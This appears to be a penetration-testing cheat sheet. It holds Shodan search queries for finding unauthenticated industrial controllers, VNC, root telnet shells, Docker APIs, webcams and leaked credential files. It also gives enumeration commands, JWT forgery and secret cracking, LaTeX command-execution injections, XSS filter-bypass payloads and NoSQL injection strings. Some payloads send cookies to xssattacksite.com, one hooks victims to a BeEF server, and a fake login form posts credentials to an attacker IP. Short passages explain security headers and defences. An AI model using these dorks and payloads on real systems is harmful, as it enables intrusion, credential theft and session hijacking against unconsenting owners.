title:"xzeres wind"

PIPS Automated License Plate Reader

"html:"PIPS Technology ALPR Processors""

Modbus

"port:502"

Niagara Fox

"port:1911,4911 product:Niagara"

GE-SRTP

"port:18245,18246 product:"general electric""

MELSEC-Q

"port:5006,5007 product:mitsubishi"

CODESYS

"port:2455 operating system"

"port:102"

BACnet

"port:47808"

HART-IP

"port:5094 hart-ip"

Omron FINS

"port:9600 response code"

IEC 60870-5-104

"port:2404 asdu address"

DNP3

"port:20000 source address"

EtherNet/IP

"port:44818"

PCWorx

"port:1962 PLC"

Crimson v3.0

"port:789 product:"Red Lion Controls"

ProConOS

"port:20547 PLC"

Remote Desktop

Unprotected VNC

"authentication disabled" port:5900,5901 "authentication disabled" "RFB 003.008"

Windows RDP

99.99% are secured by a secondary Windows login screen.

"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

Network Infrastructure

CobaltStrike Servers

product:"cobalt strike team server" ssl.cert.serial:146473198 - default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1

Hacked routers:

Routers which got compromised\ hacked-router-help-sos

Redis open instances

product:"Redis key-value store"

Citrix:

Find Citrix Gateway.\ title:"citrix gateway"

Weave Scope Dashboards

Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.

title:"Weave Scope" http.favicon.hash:567176827

MongoDB

Older versions were insecure by default. Very scary.

"MongoDB Server Information" port:27017 -authentication

Mongo Express Web GUI

Like the infamous phpMyAdmin but for MongoDB.

"Set-Cookie: mongo-express=" "200 OK"

Jenkins CI

"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"

Jenkins:

Jenkins Unrestricted Dashboard x-jenkins 200

Docker APIs

"Docker Containers:" port:2375

Docker Private Registries

"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab

Pi-hole Open DNS Servers

"dnsmasq-pi-hole" "Recursion: enabled"

Already Logged-In as root via Telnet

"root@" port:23 -login -password -name -Session

Telnet Access:

NO password required for telnet access.\ port:23 console gateway

Polycom video-conference system no-auth shell

"polycom command shell"

NPort serial-to-eth / MoCA devices without password

nport -keyin port:23

Android Root Bridges

A tangential result of Google's sloppy fractured update approach. 🙄 More information here.

"Android Debug Bridge" "Device" port:5555

Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords

Lantronix password port:30718 -secured

Citrix Virtual Apps

"Citrix Applications:" port:1604

Cisco Smart Install

Vulnerable (kind of "by design," but especially when exposed).

"smart install client active"

PBX IP Phone Gateways

PBX "gateway console" -password port:23

Polycom Video Conferencing

http.title:"- Polycom" "Server: lighttpd" "Polycom Command Shell" -failed port:23

Telnet Configuration:

"Polycom Command Shell" -failed port:23

Example: Polycom Video Conferencing

Bomgar Help Desk Portal

"Server: Bomgar" "200 OK"

Intel Active Management CVE-2017-5689

"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 ”Active Management Technology”

HP iLO 4 CVE-2017-12542

HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900

Lantronix ethernet adapter’s admin interface without password

"Press Enter for Setup Mode port:9999"

Wifi Passwords:

Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"

Misconfigured Wordpress Sites:

The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"

Outlook Web Access:

Exchange 2007

"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"

Exchange 2010

"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392

Exchange 2013 / 2016

"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"

Lync / Skype for Business

"X-MS-Server-Fqdn"

Network Attached Storage (NAS)

SMB (Samba) File Shares

Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.

"Authentication: disabled" port:445

Specifically domain controllers:

"Authentication: disabled" NETLOGON SYSVOL -unix port:445

Concerning default network shares of QuickBooks files:

"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445

FTP Servers with Anonymous Login

"220" "230 Login successful." port:21

Iomega / LenovoEMC NAS Drives

"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"

Buffalo TeraStation NAS Drives

Redirecting sencha port:9000

Logitech Media Servers

"Server: Logitech Media Server" "200 OK"

Example: Logitech Media Servers

Plex Media Servers

"X-Plex-Protocol" "200 OK" port:32400

Tautulli / PlexPy Dashboards

"CherryPy/5.1.0" "/home"

Home router attached USB

"IPC$ all storage devices"

Webcams

Generic camera search

title:camera

Webcams with screenshots

webcam has_screenshot:true

D-Link webcams

"d-Link Internet Camera, 200 OK"

Hipcam

"Hipcam RealServer/V1.0"

Yawcams

"Server: yawcam" "Mime-Type: text/html"

webcamXP/webcam7

("webcam 7" OR "webcamXP") http.component:"mootools" -401

Android IP Webcam Server

"Server: IP Webcam Server" "200 OK"

Security DVRs

html:"DVR_H264 ActiveX"

Surveillance Cams:

With username:admin and password: :P\ NETSurveillance uc-httpd Server: uc-httpd 1.0.0

Printers & Copiers:

HP Printers

"Serial Number:" "Built:" "Server: HP HTTP"

Xerox Copiers/Printers

ssl:"Xerox Generic Root"

Epson Printers

"SERVER: EPSON_Linux UPnP" "200 OK"

"Server: EPSON-HTTP" "200 OK"

Canon Printers

"Server: KS_HTTP" "200 OK"

"Server: CANON HTTP Server"

Home Devices

Yamaha Stereos

"Server: AV_Receiver" "HTTP/1.1 406"

Apple AirPlay Receivers

Apple TVs, HomePods, etc.

"\x08_airplay" port:5353

Chromecasts / Smart TVs

"Chromecast:" port:8008

Crestron Smart Home Controllers

"Model: PYNG-HUB"

Random Stuff

Calibre libraries

"Server: calibre" http.status:200 http.title:calibre

OctoPrint 3D Printer Controllers

title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944

Ethereum Miners

"ETH - Total speed"

Apache Directory Listings

Substitute .pem with any extension or a filename like phpinfo.php.

http.title:"Index of /" http.html:".pem"

Misconfigured WordPress

Exposed wp-config.php files containing database credentials.

http.html:"* The wp-config.php creation script uses this file"

Too Many Minecraft Servers

"Minecraft Server" "protocol 340" port:25565

Literally Everything in North Korea

net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24

Twitter / GitHub

dir # uses directory/file enumeration mode
dns # uses dns subdomain enumeration mode
fuzz # uses fuzzing mode
help # help about any command
s3 # uses aws bucket enumeration mode
version # shows the current version
vhost # uses vhost enumeration mode

--delay <duration> # Time each thread waits between requests (e.g. 1500ms)
-h # help for gobuster
--no-error # Don't display errors
-z # Don't display progress
-o <string> # Output file to write results
-p <string> # File containing replacement patterns
-q # Don't print the banner and other noise
-t <int> # Number of concurrent threads (default 10)
-v # Verbose output (errors)
-w <string> # Path to the wordlist

# discover txt,html,js,json,php,py files
gobuster dir -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,js,json,php,py

# exclude 403,404 codes
gobuster dir -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 403 404

# discover 0.0.0.0 subdomains 
gobuster dns -d http://0.0.0.0 -w /usr/share/SecLists/Discovery/DNS/namelist.txt

# discover txt,html,js,json,php,py files using a proxy connection
gobuster dir -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,js,json,php,py --proxy http://127.0.0.1:8081

#seclist
feroxbuster -t 10 -u http://0.0.0.0 -w /usr/share/seclists/Discovery/Web-Content/common.txt -o feroxbuster

#dirbuster
feroxbuster -t 10 -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o feroxbuster

feroxbuster -t 10 -u http://0.0.0.0 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o feroxbuster

feroxbuster -t 10 -u https://0.0.0.0 -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -o feroxbuster

feroxbuster -t 10 -u https://0.0.0.0 -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o feroxbuster

# search for directories & put 404 responses away
wfuzz -w  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  --hc 404 http://0.0.0.0/FUZZ

# search for php files
wfuzz -w wordlist/general/common.txt http://0.0.0.0/FUZZ.php

# use 2 wordlists for user & pass & put 302 responses away
wfuzz -z file,/usr/share/wordlists/rockyou.txt -d "uname=FUZZ&pass=FUZZ"  --hc 302 http://0.0.0.0/userinfo.php

# wfuzz
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://$target.com" -H "Host: FUZZ.$target.com"

# ffuf
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.target.com" -u $target.com

# amass
amass enum -d $domain

# sublistr |
sublist3r -d $domain -v

# dnsrecon
dnsrecon -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -v -d $domain

# dnsenum
dnsenum $target.com

Attacking JWT

Aim

JWT attacks involve a user sending modified JWTs to the server in order to achieve a malicious goal. Typically, this goal is to bypass authentication and access controls by impersonating another user who has already been authenticated.

The impact of JWT attacks is usually severe. If an attacker is able to create their own valid tokens with arbitrary values, they may be able to escalate their own privileges or impersonate other users, taking full control of their accounts.

Flawed Signature Verification

For example, consider a JWT containing the following claims:

{
    "username": "carlos",
    "isAdmin": false
}

Changing the parameter "isAdmin" to true : Privilege Escalation.

JWT libraries typically provide one method for verifying tokens and another that just decodes them. For example, the Node.js library jsonwebtoken has verify() and decode(). Occasionally, developers confuse these two methods and only pass incoming tokens to the decode() method. This effectively means that the application doesn't verify the signature at all.

Accepting Tokens with No Signature

{
    "alg": "HS256",
    "typ": "JWT"
}

Change the "alg" value to "none". Remove the signature part but leave the trailing dot ".".

Even if the token is unsigned, the payload part must still be terminated with a trailing dot.

Brute-forcing Secret Keys

Some signing algorithms, such as HS256 (HMAC + SHA-256), use an arbitrary, standalone string as the secret key. Just like a password, it's crucial that this secret can't be easily guessed or brute-forced by an attacker. Otherwise, they may be able to create JWTs with any header and payload values they like, then use the key to re-sign the token with a valid signature.

When implementing JWT applications, developers sometimes make mistakes like forgetting to change default or placeholder secrets. They may even copy and paste code snippets they find online, then forget to change a hardcoded secret that's provided as an example. In this case, it can be trivial for an attacker to brute-force a server's secret using a wordlist of well-known secrets.

JWT Wordlist : https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list$

If the server uses an extremely weak secret, it may even be possible to brute-force this character-by-character rather than using a wordlist.

How to

hashcat -a 0 -m 16500 $JWT $wordlist
# --show to output the result if you already run it

Then : Generate another key using JWT Editor Keys on BurpSuite, change the "k" parameter to the base64-encoded secret. Start accessing admin panels.

Tools

JWT Toolkit V2

git clone https://github.com/ticarpi/jwt_tool
cd jwt_tool/
python3 -m pip install termcolor cprint pycryptodomex requests
python3 jwt_tool.py $JWT

Security Headers

Source

Tools

SSL/TLS/Ciphers

`testssl.sh`

Security Headers

# install | usage
git clone https://github.com/saladandonionrings/NextGen-HeadersScanner.git
cd NextGen-HeadersScanner/
pip install -r requirements.txt
python h_scan -u https://$target

Strict-Transport-Security (HSTS)

The HTTP Strict-Transport-Security response header (often abbreviated as HSTS) lets a web site tell browsers that it should only be accessed using HTTPS, instead of using HTTP.

Value

Description

max-age=SECONDS

The time, in seconds, that the browser should remember that this site is only to be accessed using HTTPS.

includeSubDomains

If this optional parameter is specified, this rule applies to all of the site’s subdomains as well.

Best Synthax

Strict-Transport-Security: max-age=<expire-time>
Strict-Transport-Security: max-age=<expire-time>; includeSubDomains
Strict-Transport-Security: max-age=<expire-time>; preload

Directives

max-age=<expire-time> The time, in seconds, that the browser should remember that a site is only to be accessed using HTTPS.

includeSubDomains Optional If this optional parameter is specified, this rule applies to all of the site's subdomains as well.

preload Optional See Preloading Strict Transport Security for details. Not part of the specification.

Content Security Policy (CSP)

A Content Security Policy (CSP) requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browsers render pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections.

Directive

Description

base-uri

Define the base URI for relative URIs.

default-src

Define loading policy for all resources type in case a resource type’s dedicated directive is not defined (fallback).

script-src

Define which scripts the protected resource can execute.

object-src

Define from where the protected resource can load plugins.

style-src

Define which styles (CSS) can be applied to the protected resource.

img-src

Define from where the protected resource can load images.

media-src

Define from where the protected resource can load video and audio.

frame-src

(Deprecated and replaced by child-src) Define from where the protected resource can embed frames.

child-src

Define from where the protected resource can embed frames.

frame-ancestors

Define from where the protected resource can be embedded in frames.

font-src

Define from where the protected resource can load fonts.

connect-src

Define which URIs the protected resource can load using script interfaces.

manifest-src

Define from where the protected resource can load manifests.

form-action

Define which URIs can be used as the action of HTML form elements.

sandbox

Specifies an HTML sandbox policy that the user agent applies to the protected resource.

script-nonce

Define script execution by requiring the presence of the specified nonce on script elements.

plugin-types

Define the set of plugins that can be invoked by the protected resource by limiting the types of resources that can be embedded.

reflected-xss

Instruct the user agent to activate or deactivate any heuristics used to filter or block reflected cross-site scripting attacks, equivalent to the effects of the non-standard X-XSS-Protection header.

block-all-mixed-content

Prevent the user agent from loading mixed content.

upgrade-insecure-requests

Instruct the user agent to download insecure HTTP resources using HTTPS.

referrer

(Deprecated) Define information the user agent can send in the Referer header.

report-uri

(Deprecated and replaced by report-to) Specifies a URI to which the user agent sends reports about policy violation.

report-to

Specifies a group (defined in the Report-To header) to which the user agent sends reports about policy violation.

Example

Content-Security-Policy: script-src 'self'

X-Frame Options

X-Frame-Options response header improve the protection of web applications against Clickjacking. It declares a policy communicated from a host to the client browser on whether the browser must not display the transmitted content in frames of other web pages.

Value

Description

deny

No rendering within a frame.

sameorigin

No rendering if origin mismatch.

allow-from: DOMAIN

Allows rendering if framed by frame loaded from DOMAIN.

Example

X-Frame-Options: deny

Referrer-Policy

The Referrer-Policy HTTP header governs which referrer information, sent in the Referer header, should be included with requests made.

Value

Description

no-referrer

The Referer header will be omitted entirely. No referrer information is sent along with requests.

no-referrer-when-downgrade

This is the user agent’s default behavior if no policy is specified. The origin is sent as referrer to a-priori as-much-secure destination (HTTPS → HTTPS), but isn’t sent to a less secure destination (HTTPS → HTTP).

origin

Only send the origin of the document as the referrer in all cases. (e.g. the document https://example.com/page.html will send the referrer https://example.com/.)

origin-when-cross-origin

Send a full URL when performing a same-origin request, but only send the origin of the document for other cases.

same-origin

A referrer will be sent for same-site origins, but cross-origin requests will contain no referrer information.

strict-origin

Only send the origin of the document as the referrer to a-priori as-much-secure destination (HTTPS → HTTPS), but don’t send it to a less secure destination (HTTPS → HTTP).

strict-origin-when-cross-origin

Send a full URL when performing a same-origin request, only send the origin of the document to a-priori as-much-secure destination (HTTPS → HTTPS), and send no header to a less secure destination (HTTPS → HTTP).

unsafe-url

Send a full URL (stripped from parameters) when performing a same-origin or cross-origin request.

Example

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

X-Content-Type-Options

Setting this header will prevent the browser from interpreting files as something else than declared by the content type in the HTTP headers.

Value

Description

nosniff

Will prevent the browser from MIME-sniffing a response away from the declared content-type.

Example

X-Content-Type-Options: nosniff

X-Permitted-Cross-Domain-Policies

A cross-domain policy file is an XML document that grants a web client, such as Adobe Flash Player or Adobe Acrobat (though not necessarily limited to these), permission to handle data across domains. When clients request content hosted on a particular source domain and that content makes requests directed towards a domain other than its own, the remote domain needs to host a cross-domain policy file that grants access to the source domain, allowing the client to continue the transaction. Normally a meta-policy is declared in the master policy file, but for those who can’t write to the root directory, they can also declare a meta-policy using the X-Permitted-Cross-Domain-Policies HTTP response header.

Value

Description

none

No policy files are allowed anywhere on the target server, including this master policy file.

master-only

Only this master policy file is allowed.

by-content-type

[HTTP/HTTPS only] Only policy files served with Content-Type: text/x-cross-domain-policy are allowed.

by-ftp-filename

[FTP only] Only policy files whose file names are crossdomain.xml (i.e. URLs ending in /crossdomain.xml) are allowed.

all

All policy files on this target domain are allowed.

Example

X-Permitted-Cross-Domain-Policies: none

No longer recommended. Deprecated.

Though some browsers might still support it, it may have already been removed from the relevant web standards, may be in the process of being dropped, or may only be kept for compatibility purposes.

Be aware that this feature may cease to work at any time.

No longer recommended. Deprecated.

This feature is non-standard and is not on a standards track. Do not use it on production sites facing the Web: it will not work for every user. There may also be large incompatibilities between implementations and the behavior may change in the future.

Please use Content-Security-Policy instead.

No longer recommended. Deprecated.

This feature is no longer recommended. Though some browsers might still support it, it may have already been removed from the relevant web standards, may be in the process of being dropped, or may only be kept for compatibility purposes

Obsolete since June 2021.

JWT

Brief

JSON web tokens (JWTs) are a standardized format for sending cryptographically signed JSON data between systems. They can theoretically contain any kind of data, but are most commonly used to send information ("claims") about users as part of authentication, session handling, and access control mechanisms.

Unlike with classic session tokens, all of the data that a server needs is stored client-side within the JWT itself. This makes JWTs a popular choice for highly distributed websites where users need to interact seamlessly with multiple back-end servers.

A JWT consists of 3 parts: a header, a payload, and a signature. These are each separated by a dot, as shown in the following example:

The header and payload parts of a JWT are just base64url-encoded JSON objects. The header contains metadata about the token itself, while the payload contains the actual "claims" about the user. For example, you can decode the payload from the token above to reveal the following claims:

{
    "iss": "portswigger",
    "exp": 1648037164,
    "name": "Carlos Montoya",
    "sub": "carlos",
    "role": "blog_author",
    "email": "carlos@carlos-montoya.net",
    "iat": 1516239022
}

In most cases, this data can be easily read or modified by anyone with access to the token. Therefore, the security of any JWT-based mechanism is heavily reliant on the cryptographic signature.

Signature part

The server that issues the token typically generates the signature by hashing the header and payload. In some cases, they also encrypt the resulting hash. Either way, this process involves a secret signing key. This mechanism provides a way for servers to verify that none of the data within the token has been tampered with since it was issued:

As the signature is directly derived from the rest of the token, changing a single byte of the header or payload results in a mismatched signature.
Without knowing the server's secret signing key, it shouldn't be possible to generate the correct signature for a given header or payload.

Particularities

In other words, a JWT is usually either a JWS or JWE token. When people use the term "JWT", they almost always mean a JWS token. JWEs are very similar, except that the actual contents of the token are encrypted rather than just encoded.

HTTP Parameters

Find Parameters

Arjun

Find hidden HTTP parameters

# usage / install
pip3 install arjun
arjun --help
arjun -u $target_url

ParamSpider

Parameter miner for humans

git clone https://github.com/devanshbatham/ParamSpider
cd ParamSpider
pip3 install -r requirements.txt
python3 paramspider.py --domain $domain

Parameter Pollution

When you manipulate any parameter, it’s manipulation depends on how each web technology is parsing their parameters.

Below is the screenshot of some technologies and their parameter parsing.

Unicode char can cause breaks in some applications. Example with the pile of poo 💩 :

Understand it :

LaTex

What is LaTex ?

LaTeX is a document preparation system for high-quality typesetting. It is most often used for medium-to-large technical or scientific documents but it can be used for almost any form of publishing.

Injections

Read files

\input{/etc/passwd}
\include{somefile} # load .tex file (somefile.tex)
\lstinputlisting{/etc/passwd}

# raw files
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

Write file

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Command execution

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

# if errors : encode base64

Cross-Site Scripting

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

Resources

HTML | XSS

XSS

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Types

Stored XSS

The injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.

Reflected XSS

Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request.

Explanations

Let’s say a web page has a search box, which displays the search text alongside the search results as follows : Your search results for “searchtext”:

The web page also uses the HTTP GET request method to embed the user’s input data to the query string of the URL as follows: https://example.com/action.php?query=searchtext

If the search box is susceptible to a non-persistent XSS attack, a cybercriminal can send a malicious link to an unsuspecting user and exploit the vulnerability. This is how the script-injected link could look like:

https://example.com/action.php?query=<script>document.location=’https://xssattacksite.com/log.php?c=’ + encodeURIComponent(document.cookie)</script>

DOM XSS

DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner.

That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.

Let’s take the following example of a web page that utilizes JavaScript to manipulate a DOM element:

let searchText = document.getElementById(‘searchText’).value;
let resultsData = document.getElementById(‘resultsData’);
resultsData.innerHTML = ‘Your search results for: ‘ + searchText;

As you can see on the code snippet above, the value from a user input field is grabbed and appended to an element within the web page’s HTML. If an attacker can control this value, they can craft a devious value that forces their own code to be executed.

Here is an example :

Your search results for: “<script>document.location=’https://xssattacksite.com/log.php?c=’ + document.cookie</script>”

Payloads

Examples

<!-- put this into a form field or search bar-->
<img src=q onError=prompt('!XSS!'); />
<script>alert("!XSS!")</script>
<script>print()</script>

<!-- encoded -->
%uff1cscript%uff1eprompt("!XSS!");%uff1c/script%uff1e&
%253Cscript%253Eprint()%253C%252Fscript%253E
%253Cimg%2520src%253Dq%2520onError%253Dalert(%2522XSS%2522)%253B%2520%252F%253E

<!-- Bypassing First Filter -->
<svg/onload=alert(1)>
<svg//////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<svg%09onload=alert(1)>
<svg onload%09=alert(1)>
<svg%09onload%20=alert(1)>
<svg onload%09%20%28%2C%3B=alert(1)>
<svg onload+0B=alert(1)>
<script>\u0061lert(1)</script>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img src=x onerror="\u0061lert"/>
<img src=x onerror="eval('\141lert(1)')"/>
<img src=x onerror="eval('\x61lert(1)')"/>

 <!-- Javascript Keyword is blocked-->
<object data="JaVaScRiPt:alert(1)">
<object data="javascript&colon;alert(1)">
<object data="java  
    script:alert(1)">
<object data="javascript&#x003A;alert(1)">
<object data="javascript&#58;alert(1)">
<object data="&#x6A;avascript;alert(1)">
<object data="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;74;&#x3A;alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

N.B.

alert() print()

Use print instead of alert

Beef

Install & Config

git clone https://github.com/beefproject/beef.git
./install
nano config.yaml # change username and password
./beef

Control

<!-- insert this into xss vulnerable field : -->
<script src="http://ip_hacker:3000/hook.js"></script>

<!-- use waf bypass -->

Mitigations

Developers should implement a whitelist of allowable inputs, and if not possible then there should be some input validations and the data entered by the user must be filtered as much as possible.
Output encoding is the most reliable solution to combat XSS i.e. it takes up the script code and thus converts it into the plain text.
A WAF (Web Application Firewall) should be implemented as it somewhere protects the application from XSS attacks.
Use of HTTPOnly Flags on the Cookies.
The developers can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities.

HTML Injection

Check

Form fields
- Exploit with BurpSuite using URL Encode

Payloads

<!-- URL ENCODE THESE & put them in a form field -->
<b>test</b>
<a href="https://google.com">test</a>
<img src= "https://www.ignitetechnologies.in/img/logo-blue-white.png">

<!-- add a form field to website -->
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;">Please login with valid 
credentials:<br><form name="login" action="http://192.168.0.7:4444/login.htm">
<table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td>
<td><input type="text" name="password"/></td></tr><tr>
<td colspan=2 align=center><input type="submit" value="Login"/></td></tr>
</table></form>

Mitigations

The developer should set up his HTML script which filters the meta-characters from user inputs.
The developer should implement functions to validate the user inputs such that they do not contain any specific tag that can lead to virtual defacement.

CSRF

What is a CSRF attack ?

In a Cross-Site Request Forgery attack, a malicious site tricks a victim's browser into making an unwanted request to a different site on which the victim is authenticated, potentially causing the victim to perform an action on that site without their knowledge or consent.

How does it work?

Imagine a scenario where you're logged into your online banking. While still logged in, you visit a different website that has some malicious code. This malicious website can send a request to your bank's website to transfer money without your knowledge. If the bank's website doesn't have proper CSRF protections, it would think that you made the request because your authentication cookies are automatically included by your browser.

Key points about CSRF:

Relies on the authenticated state: The attack works because browsers automatically include any cookies associated with a domain in requests made to that domain. So if you're authenticated to a website, that means any requests made to that website (even from a different website) will include your cookies.
Doesn't steal data directly: CSRF isn't about stealing data. Instead, it tricks the victim into performing actions without their knowledge.
Exploits trusted relationships: CSRF exploits the trust a website has in the user's browser, not necessarily a flaw in the website's design (although lack of CSRF protections is considered a design flaw).

How to prevent CSRF attacks?

Use Anti-CSRF Tokens: The most common way to prevent CSRF attacks is to use anti-CSRF tokens. This involves sending a random token in each request which the server verifies. Since the malicious site won't know this token, it can't forge a valid request.
SameSite Cookie Attribute: Modern browsers support the SameSite cookie attribute, which can prevent the browser from sending cookies along with cross-site requests, mitigating the risk of CSRF attacks.
Check the Referer and Origin Headers: Servers can check these HTTP headers to see if a request is coming from a trusted origin.
Require Reauthentication for Sensitive Actions: For very sensitive operations, like changing a password, always prompt users to re-enter their current password.
Be cautious with CORS: Cross-Origin Resource Sharing (CORS) headers shouldn't be used recklessly, as they can allow unwanted cross-site interactions.

# Similar to admin'--
# Ignores the password input
Instructing MongoDB to find a document (user) with a username equal to **admin** and his password is not equal to **xyz**, which turns this statement to TRUE because the admin's password is not xyz.

 http://example.thm.labs/search?username=admin&role[$ne]=user
 http://example.thm.labs/search?username=ben&role=user
 http://example.thm.labs/search?username[$ne]=ben&role=user
 
# On Login pages / search bars
admin' || 'a'=='a

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1

Network Scanners

nmap

Nmap is a network scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection.

# Default nmap script scan
sudo nmap -sV -sC -p- 0.0.0.0

Banner Grabbing

nmap -sV --script=banner -p21 0.0.0.0/24.
nc -nv 0.0.0.0
netcat 0.0.0.0 port

Protocols

# TCP
nmap –Pn –sT -sC –sV –p0-65535 0.0.0.0

# FTP
nmap -sC -sV -p21 0.0.0.0

# SMB
nmap --script smb-os-discovery.nse -p445 0.0.0.0

-Pn # disables the ping command and only scans ports
-f # used to fragment the packets (i.e. split them into smaller pieces) making it less likely that the packets will be detected by a firewall or IDS.
# ALTERNATIVES TO -f, but providing more control over the size of the packets: 
--mtu <number> # accepts a maximum transmission unit size to use for the packets sent. This must be a multiple of 8.
--scan-delay <time> # in ms, used to add a delay between packets sent. This is very useful if the network is unstable, but also for evading any time-based firewall/IDS triggers which may be in place.
--badsum # this is used to generate in invalid checksum for packets. Any real TCP/IP stack would drop this packet, however, firewalls may potentially respond automatically, without bothering to check the checksum of the packet. As such, this switch can be used to determine the presence of a firewall/IDS.

# Scan from spoofed IP
nmap 192.168.1.1 -D 192.168.1.2

# Scan Facebook from Microsoft
nmap -S www.microsoft.com www.facebook.com

# Use a specific source port
nmap 192.168.1.1 -g 53

Examples

# http site map generator
nmap -Pn --script=http-sitemap-generator scanme.nmap.org 

# Fast search for random web servers
nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000 

# Brute forces DNS hostnames guessing subdomains
nmap -Pn --script=dns-brute domain.com

# Safe SMB scripts to run
nmap -n -Pn -vv -O -sV --script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1 

# Whois query
nmap --script whois* domain.com 

# Detect cross site scripting vulnerabilities.
nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org 

# Check for SQL injections
nmap -p80 --script http-sql-injection scanme.nmap.org

rustscan

Faster than nmap

# Use in most cases : Noisy AF
rustscan -a 0.0.0.0 -- -A -sC -sV -oN initial.log

# SYN "Stealth" scan
sudo rustscan -a 0.0.0.0 -- -vv -oN Initial-SYN-Scan

# Service Scan
sudo rustscan -a 0.0.0.0 -p 22,53,80,443 -- -sV -Pn -vv

# Multiple IP Scanning
rustscan -a 0.0.0.0,1.1.1.1

# CIDR support
rustscan -a 192.168.0.0/30

# Selected port scanning
